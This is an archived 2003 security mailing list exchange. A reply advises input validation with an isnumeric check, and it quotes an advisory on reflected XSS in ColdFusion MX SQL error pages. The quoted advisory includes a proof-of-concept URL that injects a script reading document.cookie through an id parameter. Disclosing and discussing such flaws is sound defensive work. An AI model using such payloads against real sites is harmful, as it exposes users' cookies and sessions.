lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <7A626FF425518246801C933014AA98F0063D15@hou-ex01.ihtx.iland.com>
Date: Wed, 15 Oct 2003 16:26:36 -0500
From: "Keith Kikta - iLand Internet Solutions Corp." <keith.kikta@...nd.com>
To: "Full-Disclosure" <full-disclosure@...ts.netsys.com>
Cc: "BUGTRAQ" <bugtraq@...urityfocus.com>
Subject: RE: ColdFusion SQL Error Pages XSS



The code should check the value of "id".
Like :

<cfif isnumeric(ID)>
	Proceed 
<cfelse>
	Custom Error...
</cfif> 

This has always been in cold fusion. It is desired functionality. Wither or not the coder wanted this to happen is his/her problem not macromedia. 

-----Original Message-----
From: Lorenzo Hernandez Garcia-Hierro
[mailto:lorenzohgh@...g-security.com]
Sent: Wednesday, October 15, 2003 3:37 PM
To: Full-Disclosure
Cc: BUGTRAQ
Subject: ColdFusion SQL Error Pages XSS


----------
NOTE ABOUT COLDFUSION XSS ATTACKS
_______
Vendor: Macromedia
Versions: MX ( 6.0 ) tested , older ?
_______

PROBLEM:
When you access to an error page of  sql you can insert xss code to be shown
in the error uotput of the sql backend.
example:
http://[target]/article.cfm?id=1'<script>alert(document.cookie);</script>
the output:
Error Occurred While Processing Request
      Error Diagnostic Information
      [SQL SERVER] Error Code = code

      SQL SERVER-XXXX: SQL command not properly ended



      SQL = "SELECT article AS articleID FROM articlesnews WHERE newsID =
1'[HERE COMES THE XSS THAT IS EXECUTED]

      Data Source = "XXXXXXXXXXXXXXXXXXXXXX"


      The error occurred while processing an element with a general
identifier of (CFQUERY), occupying document position (7:2) to (7:58) in the
template file /xxxxxxxxxxxxxxxxxxxx/articles.cfm.


      Date/Time: Moof 2003
      Browser: Browserio

      Remote Address: xxx.xxx.xxx.xxx

      Query String: id=1'[again executed the xss attack]




Please inform the site administrator that this error has occurred (be sure
to include the contents of this page in your message to the administrator).

-----
CONTACT INFO:
-------------------------------
0x00->Lorenzo Hernandez Garcia-Hierro
0x01->/* not csh but sh */
0x02->$ PATH=pretending!/usr/ucb/which sense
0x03-> no sense in pretending!
__________________________________
PGP: Keyfingerprint
4ACC D892 05F9 74F1 F453  7D62 6B4E B53E 9180 5F5B
ID: 0x91805F5B
**********************************
No Secure Root Group Security Research Team
http://www.nsrg-security.com
______________________


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ